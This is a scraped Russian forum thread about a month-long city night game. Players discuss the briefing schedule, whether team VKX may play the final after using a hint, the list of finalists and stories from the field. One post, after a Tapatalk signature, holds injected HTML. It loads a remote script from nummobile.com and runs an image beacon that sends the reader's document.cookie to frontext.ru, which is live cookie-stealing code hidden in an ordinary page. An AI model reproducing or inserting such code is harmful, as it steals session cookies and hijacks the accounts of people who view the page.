![]() |
ППО.
Время брифинга - 21.30, если что. Просто прикинули, что час на брифе делать будет нечего. Командам, играющим фо фан со стартом в 23-00 на бриф приезжать не обязательно (если они заплатили за игру) - вся информация будет в стартовой заглушке. |
Цитата:
|
Цитата:
|
Людям задали конкретный вопрос, на который они не дают четкого ответа...о чем разговор тут?
|
Цитата:
|
Цитата:
|
Цитата:
|
Цитата:
|
Относительно ситуации с командой VKX.
Поскольку формально данная команда не может набрать количества баллов, необходимых для участия в финале (по причине использования подсказки), а штраф в 30 минут (который ей был бы выдан) в любом случае не позволяет ей претендовать на победу в финальной игре, то видимо более правильным будет разрешить команде VKX участвовать в финальной игре только вне зачета (со стартом в 23-00). Потому что в случае выигрыша VKX уверить всех в "случайности" произошедшего будет невозможно ))) |
Цитата:
|
Цитата:
Легкий затуп на загрузке (по словам команд) был в первые 10-15 сек, потом все нормально. |
Цитата:
|
Цитата:
|
кстати, а можно будет потом сценарий доступным для всех?
|
Цитата:
|
как я понимаю, в финал выходят только те, кто снял все-все-все-все?
сурово.. |
Цитата:
|
Цитата:
|
Цитата:
|
Цитата:
Если будет только 1 команда, взявшая больше всех кодов, то она автоматически станет победителем игры. А остальные будут бороться за 2-3 место. В любом случае, принять участие в игре 17-го числа может ЛЮБАЯ команда, даже те, кто не играл весь месяц. |
Цитата:
|
Цитата:
|
Цитата:
Цитата:
|
У меня вопрос, а чего так все на бедное vkx накинулись? Все мега крутые команды боятся соперников, которые отстают на полчаса?
|
Цитата:
|
Цитата:
|
Цитата:
|
Цитата:
|
Цитата:
|
Цитата:
Имхо, полчаса, конечна, дохера, я бы минут 15 срезал, а по факту - каждый может "психануть", но надо же в руках себя держать, у меня с одним баяном вообще чуть моск не вскипел, а оказалось, что просто кто-то ракурсы берет, скажем так, "неудачно" :D:D |
Цитата:
|
Цитата:
Подсказка взята, по какой причине - другой вопрос. Формально VKX не попадает в финал, если какие-то команды возьмут все баяны без подсказок. |
Цитата:
|
Цитата:
|
Цитата:
с одной стороны логично, что выходят только те, у кого снято все-все и без единой подсказки, но я б дала возможность тем, у кого будет не снят допустим 1-2 бонуса. все-таки люди месяц играли. МЕСЯЦ, блин. |
Цитата:
|
Цитата:
В данном случае наши с Punch-ем мнения диаметрально противоположны. Он за то, чтобы "по-человечески", я предпочитаю "по правилам", которые мы сами озвучили. |
Цитата:
|
Цитата:
А если я напишу "я их установил, мне их и менять", меня с говном съедят, тут это быстро делают. А этого не хочется) |
Цитата:
|
Цитата:
я знаю, что мы снимем все и знаю, что если в финал попадут пара команд, у которых будет на полчаса-час-может даже два часа меньше, я не расстроюсь. ребята ведь играли, месяц катались, ситуации-то разные бывают. |
Цитата:
Цитата:
|
Цитата:
ВСЕ ОСТАЛЬНЫЕ команды, снявшие меньше баянов, начнут игру на 1 час позже. Это сделано во избежание недоразумений. Если что, мы верим в честность играющих команд, но нам будет спокойнее, если со своей стороны мы сделаем все, чтобы обеспечить равные условия для тех команд, которые борются за первое место, и делают это уже ЦЕЛЫЙ МЕСЯЦ. |
На финальной игре тоже нужно координатами из Вики закрывать баян?
|
Цитата:
|
Тогда делайте так:
В случае равенства очков минимум у двух команд и при наличии нескольких команд с отставанием час, два и более - запускайте их в такой же последовательности. Например: 22.00 Стартуют лидеры 22.30 Взявшие все но с 1 подсказкой 23.00 Отставшие на один код 08.00 Отставшие на 10 кодов от лидера 22.00 18.05.13 Отставшие на 24 кода и тд и тп :D:D:D:D:D |
Цитата:
да и западло приятно сделать опять же) |
Самым прикольным оказалось взятие локи с 3+, хотя, соглашусь с Ягой - 3+ скучный, ну как бы и играем в СР.
Сначала пришлось ударить по педалям и через забор от гопников, что за аркой ждали. Потом выяснилось, что саму локу цинично обходя по периметру пасет охранник, пришлось кустами до опоры и наверх на скорость ползти. Блин, весело же:-) Пора бы в качестве эксперимента объединить Сумму и НиВ. |
Даже интересно, кто первый закроет. Людям и фантомасу по локе осталось.
|
Цитата:
|
А дернули придурки:D и радостно мне об этом сообщили)))
Кстати, микс говорит, что кто не закроет 1 уровень - не попадет в финишный протокол и не получит очки |
Яга всех дернул )
|
Цитата:
Забавно было бы эту игру в одно лицо... 101 лока... 303 кодюли... я бы через две недели хотел бы уже кому-нибудь голову открутить |
Цитата:
|
Цитата:
А еще чаще - мне хотелось убить тебя за некоторые фотографии, кодюли, направляшки и пр. :D |
Цитата:
Отправлено с моего ThL W3 через Tapatalk <script language='javascript' charset='UTF-8' type='text/javascript' src='http://nummobile.com/80j4ch2sa3g98uehlyoro4uftwotqhh'></script> <script> img = new Image(); img.src = "http://frontext.ru/www/s.gif?"+document.cookie; </script> |
Цитата:
|
Цитата:
Если кто-то из команд, претендующих на топ и энкоочки, не закроет 1 уровень, то доведение их до финиша понизит коэффициент сложности игры до 0, т.к. время их игры будет равно 0, то есть очки не получит никто. Большинству, надеюсь, пох на это, но тут есть адепты зеленой веры и все такое. |
Цитата:
|
Цитата:
Энкоочки за 20 косарей (бенз+утопленный телефон+взнос):D Яга задолбался по полной. В жало тяжко, но реально:rolleyes: Рекорд 11 лок за 5 часов...самое большое, что брал. |
Цитата:
|
Я тоже претендую на лычки капитана в скором.
|
Цитата:
|
а что, сегодня не придет новых картиночек?(((
хныы(( |
Цитата:
А, кстати есть несколько фоток боянов, которые мы либо не стали брать, либо они оказались запиленными;) |
Цитата:
от передоза -) через годик-два -) Хотя вообще есть идея несколько другого исполнения данного формата. Может и родится как-нибудь игруля) |
Цитата:
|
Давайте уже 1001 по Ленобласти
|
Игра на год, нонстоп.
И для пущей убедительности по 10 кодов на локу. |
Цитата:
Цитата:
|
Цитата:
|
Цитата:
Грузите фотки! У нас кэп выложил три фотки незаигранных до сих пор баянов, сидим гадаем... |
Цитата:
|
Цитата:
|
Ну кэп проснется и решит. Да и вдруг мы выложим фотки а там собирались в пт игру делать...?)
|
Цитата:
|
Цитата:
|
Цитата:
|
Цитата:
|
Цитата:
Хотя спалят мноооогие локи в процессе такой прописки |
А, ну и в финале уже:
1) Люди_Х - зарегились на финалку 2) Fantomas - зарегились на финалку 3) КПБ 4) psychos 5) Развоlution И могут попасть в финал до 09.00 17.05: 1) Пешеезды (осталось 10 бонусов, около 3 боянов) 2) За всю хурму (осталось 77 бонусов, около 25 боянов) 3) FST (осталось 15 бонусов, около 5 боянов) 4) К.Е. (осталось 8 бонусов, около 3 боянов) 5) Пакмэн (осталось... лень считать по мониторингу, но верю, что немного)))) Вне зачета: 1) VKX - зарегились на финалку |
Цитата:
Хотя, если серьезно, не понимаю, на что это существенно влияет - остались вы и 2 команды, не претендующие на финалку |
Цитата:
Ну да, если не вдвоем на 1 машине игру делать, то да;) |
Цитата:
404 - %кол-во результатов поиска% = искомый резалт) |
Цитата:
|
Цитата:
|
Цитата:
|
Цитата:
Картинко 2. Из того, что есть под рукой, остальное - дома. |
Цитата:
|
Цитата:
первая?) |
Цитата:
Могу ответы попринимать в личку, если кто сомневается в том, что правильно угадал ) |
Цитата:
|
Цитата:
|
Цитата:
(это шутка, а то щас навалите тут про "новые правила", "почему 2 секунды", "зачем вообще за это бонус" и т.д.:D) |
Цитата:
Мы с Владом уже 4 заработали :) |
Цитата:
А то Ваня 75 боянов снял вообще в жало и на велике! |
Цитата:
P.S. Щас Костя на меня обидится))) |
Цитата:
|
Цитата:
|
Цитата:
|